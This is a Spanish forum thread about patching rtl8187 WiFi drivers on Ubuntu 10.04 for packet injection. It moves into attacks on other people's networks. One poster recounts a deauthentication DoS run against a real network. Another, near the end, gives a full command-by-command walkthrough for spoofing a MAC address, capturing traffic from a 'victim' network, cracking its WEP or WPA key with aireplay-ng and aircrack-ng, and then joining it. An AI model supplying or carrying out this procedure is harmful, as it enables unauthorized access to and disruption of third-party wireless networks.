Foro de elhacker.net

Seguridad Informática => Wireless en Linux => Mensaje iniciado por: zydas en 5 Mayo 2010, 00:18 am



Título: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: zydas en 5 Mayo 2010, 00:18 am
INYECTAR CON UBUNTU 10.04 TLS Y ALFA AWUS036H

No he encontrado ningún manual para este kernel (2.6.32-21-generic), según aircrack-ng.org funciona para rtl8187b pero no totalmente, como no tengo este chipset no lo he podido probar.

El kernel utilizado es 2.6.32-21-generic y el driver rtl8187_linux_26.1010.

IMPORTANTE: Antes de poner la tarjeta en modo monitor hay que desactivar la red inalámbrica, esta tontería me ha llevado muchas horas de trabajo para evitar que mi viejo PC se bloqueara. Para desactivar la red teneis que ir con el ratón a la parte superior de la pantalla (icono ondas wireless), click derecho y desmarcar <activar inalámbrica>

Para poner nuestra tarjeta en modo managed recomiendo desconectar y conectar del usb.

COMENZAMOS....

Abrimos una shell y nos logeamos como superusuario para evitar usar sudo.

Código:
sudo su

Insertamos nuestra contraseña e instalamos patch para poder parchear.

Código:
apt-get install patch

COPIA DE SEGURIDAD DE DRIVERS ORIGINALES EN ROOT.

Es muy reconmendable hacerlo pero los temerarios y los imprudentes pueden saltarse este paso

Código:
cp /lib/modules/2.6.32-21-generic/kernel/drivers/net/wireless/rtl818x/rtl8187.ko /root/

Copiamos ieee80211 en directorio 80211.

Código:
mkdir /root/80211/
cp /lib/modules/2.6.32-21-generic/kernel/net/wireless/* /root/80211/

BORRADO DE DRIVERS ORIGINALES.

Código:
rm /lib/modules/2.6.32-21-generic/kernel/drivers/net/wireless/rtl818x/rtl8187.ko
rm /lib/modules/2.6.32-21-generic/kernel/net/wireless/*


INSTALACION DEL NUEVO DRIVER

descargamos el driver de aircrack-ng.org.

Código:
wget http://dl.aircrack-ng.org/drivers/rtl8187_linux_26.1010.zip

Descomprimimos el driver

Código:
unzip rtl8187_linux_26.1010.zip

Nos cambiamos al nuevo directorio donde se encuentra el driver.

Código:
cd rtl8187_linux_26.1010.0622.2006/

Descargamos los parches.

Código:
wget http://patches.aircrack-ng.org/rtl8187_2.6.27.patch
wget http://patches.aircrack-ng.org/rtl8187_2.6.32.patch

Descomprimimos parches en el mismo directorio que el driver:

Código:
tar xzvf drv.tar.gz
tar xzvf stack.tar.gz

Parcheamos el driver y ieee80211.

Código:
patch -Np1 -i rtl8187_2.6.27.patch
patch -Np1 -i rtl8187_2.6.32.patch

Compilamos.

Código:
make

Instalamos.

Código:
make install

Si pensais que ya tenemos los drivers listos para inyectar estais muy equivocados. Están instalados pero NO en el lugar correcto.


COPIAR DRIVERS EN SUS DIRECTORIOS PARA QUE DEPMOD PUEDA CARGARLOS.

Copiamos el driver.

Código:
cp /lib/modules/2.6.32-21-generic/kernel/drivers/net/wireless/rtl8187/r8187.ko /lib/modules/2.6.32-21-generic/kernel/drivers/net/wireless/rtl818x/

Copiamos ieee80211

Código:
cp /lib/modules/2.6.32-21-generic/kernel/drivers/net/wireless/rtl_ieee80211/* /lib/modules/2.6.32-21-generic/kernel/net/wireless/

Reconstruimos las dependencias.

Código:
depmod -ae

reiniciamos.

Código:
reboot

Ahora tenemos los drivers parcheados e instalados dispuestos para inyectar.

para comprobar si nuestros dirvers inyectan lanzar directamente.

Código:
aireplay-ng wlan0 --test


BORRAR DIRECTORIOS TEMPORALES

Código:
rm -r /lib/modules/2.6.32-21-generic/kernel/drivers/net/wireless/rtl8187
rm -r /lib/modules/2.6.32-21-generic/kernel/drivers/net/wireless/rtl_ieee80211

RESTAURAR LOS DRIVER ORIGINALES

Algo ha salido mal y ubuntu no reconoce vuestra alfa.

Código:
rm /lib/modules/2.6.32-21-generic/kernel/drivers/net/wireless/rtl818x/*
rm /lib/modules/2.6.32-21-generic/kernel/net/wireless/*
cp /root/rtl8187.ko /lib/modules/2.6.32-21-generic/kernel/drivers/net/wireless/rtl818x/
cp /root/80211/*  /lib/modules/2.6.32-21-generic/kernel/net/wireless/
depmod -ae
reboot

!ESTO ES TODO AMIGOS!
(http://r.i.elhacker.net/cache?url=http://img197.imageshack.us/img197/5447/estoestodoamigos.png)
 



Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: cold_ en 11 Mayo 2010, 14:15 pm
Buenas a tod@s!

Lo primero dar las gracias al autor del post ;)

He seguido el manual y ahora consigo inyectar perfectamente con mi RTL8187 (USB)... pero mi problema es el siguiente: al seguir el manual resulta que me anula la tarjeta con chip Atheros AR9285 (Mini PCI).

Para dar todos los datos posibles diré que utilizo un Netbook con Ubuntu 10.04. Utilizo dos tarjetas wifi:
1. USB (RTL8187) la cual funciona a las mil maravillas despues del manual.
2. Mini PCI (Atheros AR9285) que ni me la reconoce el iwconfig despues del manual.

Por supuesto ambas funcionaban con los drivers que traía Ubuntu sin ningún problema (salvo la inyección claro).

A ver si me podeis echar una mano para que la Atheros me funcione normalmente despues de llevar a cabo el manual. Y ya si me dijerais cómo parchear la Atheros para que tambien inyecte sería la leche ;)

Un saludo a tod@s y gracias de antemano.


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: zydas en 13 Mayo 2010, 22:12 pm
UPPPS, creo que he cometido un ERROR.....

La alfa awus036h si inyecta en ubuntu 10.04 LTS,

Para ponerla en modo monitor no sirve el comando iwconfig <inteface> mode monitor hay que ponerla con airmon-ng start <interface>

Una vez puesta en modo monitor crea una interface virtual llamada monX, esta interfaz la debeis usar para la inyección.

Saludos  :-(


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: neetro en 1 Junio 2010, 04:47 am
Ayuuuuuuudaaaaaaaaaaaaaaa!, he hecho todos los pasos que alli muestra y todo va bien, todo me sale bien el problema es kuando inicio konsola y pongo aireplay-ng wlan0 --test
me aparece esto:
20:44:28  Trying broadcast probe requests...
20:44:30  No Answer...
20:44:30  Found 0 APs

ya no se que hacer lo he intentado de todo y nada.... por favor....

y si pongo este codigo # airodump-ng -c 11 -w nombre mon0
para detectar las redes a mi alrededor me sale esto:

Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device
 :(



Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: zydas en 1 Junio 2010, 20:59 pm
Para airodump-ng debes utilizar la interface wlan0 y no ponerla en modo monitor con iwconfig o airmon-ng, airodump-ng pone la interface automaticamente en modo monitor.

Si no tienes ningun AP cedrca dificil veo que puedas probar tu driver.

Saludos


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: neetro en 6 Junio 2010, 22:42 pm
Ya puede inyectar con mi alfa awuso36h todo bien y ya detekte una Ap para poder probarla, el problema es que kuando hago todo los pasos para inyectar todo va bien, el problema es que los #Data van demasiado lentos, pero demasiado, he autenticado la conexion para poder elevar los #Data pero nada funciona, va demasiado lento, asi nunka podre probar si funciona o que, y otro detalle en PWR el valor que tiene es -1, sera x eso que no inyecta rapido. Porfavor ayudenme!!!! se los agradecere mucho

Esto es un tutorial para que se reconozca la Alfa en Ubuntu... preguntas sobre su uso a un nuevo post...pero antes hay que LEER



<script src='http://img153.imageshack.us/shareable/?i=pantallazo1p.png&p=tl' type='text/javascript'></script><noscript>(http://r.i.elhacker.net/cache?url=http://img153.imageshack.us/img153/6651/pantallazo1p.png) (http://img153.imageshack.us/i/pantallazo1p.png/)</noscript>

<script src='http://img153.imageshack.us/shareable/?i=pantallazo2lx.png&p=tl' type='text/javascript'></script><noscript>(http://r.i.elhacker.net/cache?url=http://img153.imageshack.us/img153/6854/pantallazo2lx.png) (http://img153.imageshack.us/i/pantallazo2lx.png/)</noscript>

<script src='http://img94.imageshack.us/shareable/?i=pantallazo3xh.png&p=tl' type='text/javascript'></script><noscript>(http://r.i.elhacker.net/cache?url=http://img94.imageshack.us/img94/8319/pantallazo3xh.png) (http://img94.imageshack.us/i/pantallazo3xh.png/)</noscript>

estoy usando ubuntu 10.04 lts


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: estramonio en 19 Julio 2010, 19:11 pm
He llegado a este hilo buscando algunos porqués de mi alfa cuando la pongo en modo monitor.  No es realmente, importante pero viendo todo el hilo quiro contar mi experiencia.

Soy nuevo en Ubuntu y me encanta toquetear todo hasta el punto de que he tenido que reinstalar todo el sistema , porque ya no sabía ni lo que tenía.(gnome, kade, Konsole, ... yo que se)
l
Tenía 10.4,  Probe con los drivers del CD , luego me baje los dos del fabricante, luego cambie network manager por Wicd ... despues de tantos cambios el portatil se quedaba colgado.

Probé instalando Debian, , luego otra vez Lucid (10.04) que me baje de la web., nada no funcionaba bien la cosa. Me daba errores o lo que yo interpretaba como errores y que en realidad era puro desconocimiento. Por ejemplo en un determinado momento podía cambiar mi mac y en otro no. Lo que aqverigue despues es que bajando la interfaz siempre te deja , luego la levantas y ya está

La mejor configuración y mas estqable que he conseguido ha sido , cargando Ubuntu 9.04 de nuevo y dejandole que se actualizase el solo hasta la 10.04 .

Respecto a la Alfa. NO he instalado ningun driver y funciona de maravilla.

Esta mañana puse el airodump y despues de ocho horas habia obtenido 15.000 paquetes,no estaba seguro de si inyectaba correctamente y por la interface adecuada. asi que me decidi a hacer un ataque DoS . Ataque -0 de aireplay y en menos de cuarto de hora he obtenido 50.000 , claro no se si durante ese cuarto de hora los usuarios de la red se han estado acordando de mis antepasados (como no estaba seguro no me atreví a lanzar el ataque antes).

Por lo que respecta a Windows , tambien tuve problemas siguiendo las instrucciones del fabricante. Haciendolo al reves, esto es enchufando la Alfa y que Windows te pida los drivers ha funcionado de maravilla.

Asi que , a veces no hacer nada es una acción que puedes elegir. En este caso no instlar nada y que quien lo necesite (windows) te lo pida.


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: KuraraGNU en 26 Agosto 2010, 11:11 am
He conseguido sacar 250000 datas de una red, pero al hacer aircrack-ng no me encuentra la clave. Es una Wlan_XX pero bueno, yo lo quiero hacer de forma genérica para cualquier red por si acaso la clave no es la de fábrica, sino pues intento con diccionario, el caso es que no se hacerlo :/ por más manuales que leo, si alguno me puede ayudar se lo agradecería. Lo hago por comandos en ubuntu 10, quizás es que tengo que actualizar algo, no se. El paquete me lo descargué desde el gestor de paquetes.


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: joxe mari en 29 Agosto 2010, 23:59 pm
hola. gracias por el curro del manual. a los que estamos empezando este tipo de cosas nos ayuda un monton. tengo una duda. haciendo lo del manual, a parte de inyectar en ubuntu con la alfa, luego podria conectarme a una red inalambrica....? es el problema que tengo, no consigo conectarme con la alfa a internet despues de la auditoria.... gracias.


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: hdarko en 3 Septiembre 2010, 21:02 pm
Gracias Zydas, acabo de comprar un adaptador wifi Wisacom WS-HP800, con chipset RT8187L, y siguiendo tu instrucciones la acabo de instalar en mi ubuntu, con kernel 2.6.28-19 y todo perfecto.
Gracias  ;-)
También la tengo funcionando en wifiway. :D


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: manuoboista en 4 Febrero 2011, 21:42 pm
zydas de verdad eres un makina gracias por postear esto :D :D :D :D :D


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: P4nd3m0n1um en 21 Marzo 2011, 19:12 pm
el ubuntu no requiere el pach, yo uso ubuntu 10.04.2 y solo puse el aircrack-ng-plw y el airoscript y inyecta sin nigun problema.


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: P4nd3m0n1um en 26 Marzo 2011, 18:15 pm
con solo un doble clic en la descarga:

http://www.megaupload.com/?d=UTN706CR (http://www.megaupload.com/?d=UTN706CR)

 :silbar: :silbar: :silbar: :silbar: :silbar:


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: P4nd3m0n1um en 28 Abril 2011, 02:51 am
con solo un doble clic en la descarga:

http://www.megaupload.com/?d=UTN706CR (http://www.megaupload.com/?d=UTN706CR)

 :silbar: :silbar: :silbar: :silbar: :silbar:

este es el driver del backtrack, funciona en ubuntu y kubuntu


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: nou en 6 Mayo 2011, 00:24 am
hola amigos:

he seguido este post y muchos que posteais en este for y la verdad esque siempre me ha sido de gran ayuda primero agradecer por todo eso.

2º  como cita dvdr en otro post junto a heaviloto
estos son los pasos para poner el parche de los drivers en ubuntu maverick 10.10
por que a estas alturas ya estan diponibles para descarga incluido para 10.04
yo los he probado y va de maravilla yo tengo una alfa 500 con chipset rtl8187l
he corregido un error que daba pero gracias a que lo indicaba dvdr un poco mas adelante en el post

Esto va bien se puede copiar, pegar y ejecutar pero: (no ejecute ningun codigo si no sabe lo que hace ya que es un peligro para tu ordenador y para tus datos "esto siempre hay que tenerlo presente
Citar
aqui tienes dos



 sudo apt-get install build-essential

wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2

tar -jxf compat-wireless-2010-10-16.tar.bz2

cd compat-wireless-2010-10-16

wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch

patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch

wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch

patch ./net/wireless/chan.c channel-negative-one-maxim.patch
----------------------------------
gedit scripts/update-initramfs

KLIB=/lib/modules/$(uname -r)/build
-------------------------------------
make
sudo make install

sudo reboot

------------------------------------------2---------------------
sudo apt-get install build-essential

wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-12-01.tar.bz2
tar -jxf compat-wireless-2010-12-01.tar.bz2
cd compat-wireless-2010-12-01
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat0808 2009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch

---------------------------------------------------
gedit scripts/update-initramfs

KLIB=/lib/modules/$(uname -r)/build
----------------------------------------------------
make
sudo make install

sudo reboot



3º una vez tengas hecho esto puedes empezar con el ataque

Lo primero es instalar la Suite aircrack-ng 
sudo apt-get install aircrack-ng

Luego instalamos Macchanger 
sudo apt-get install macchanger

Una vez instalado nos aseguramos de no estar conectados en ninguna red inalambrica, dando click derecho en el icono de la red y desactivando la red inalambrica, y abrimos una terminal: 

- Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO SE PUEDE ACTIVAR, NO PODRÁS CRACKEAR) 
Sudo airmon-ng start wlan0

- Vemos que nos sale que se activo en mon0, asi es que trabajaremos con mon0 

-Damos de Baja mon0 
sudo ifconfig mon0 down

-Cambiamos la direccion mac de mon0 por 00:11:22:33:44:55 
sudo macchanger -m 00:11:22:33:44:55 mon0

- Damos de alta mon0 
sudo ifconfig mon0 up


- Escaneamos las redes disponibles, y encontraremos nuestra victima 
sudo airodump-ng mon0


- Detenemos la escaneada pulsando
control – c

- Ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima 
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0

- Abrimos otra terminal SIN CERRAR LA ANTERIOR y empezamos el ataque a la red 
- Cambiando los datos de los corchetes por los de nuestra victima 

PARA WEP 
sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0

PARA WPA
sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0

- Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima. 

PARA WEP
sudo aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b [direccion MAC] -h 00:11:22:33:44:55 mon0

- Le decimos que si (y) y le damos enter 

PARA WPA
sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap

Descarga del diccionario para WPA (Subido Por MI)

PARA WEP 
- Abrimos la 4ta y ultima terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima. 
sudo aircrack-ng -z [nombre red]*.cap
y esperamos a que nos descifre la clave, una ves descifrada con exito te dara la clave en formato [XX:XX:XX:XX:XX], y activa tu red inalambrica dando click derecho al icono de la red, Seleccionamos la red crackeada e ingresamos la clave que nos dio de resultado aircrack en formato XXXXXXXXXX. Y LISTO! ya crackeaste una red WIFI con encriptacion WEP o WPA. 

Consejo: NO UTILIZES ENCRIPTACION WEP PARA TU RED, UTILIZA EN LUGAR WPA!

espero que le sirva a alguien.


Título: Re: inyectar con ubuntu 10.04 TLS y alfa awus036h
Publicado por: Dondvp en 12 Octubre 2011, 13:59 pm
Saludos

Temgo un Kubuntu 11.04 y al intentar usar el aireplay-ng me aparecia el error "channel fixet in -1" tiempo atrás tenia ubuntu y no tube ningún problema. He buscado por internet i por mucho que he seguido tutoriales no he podido solucionar el problema. tengo una atheros 9k.

Gracias de antemano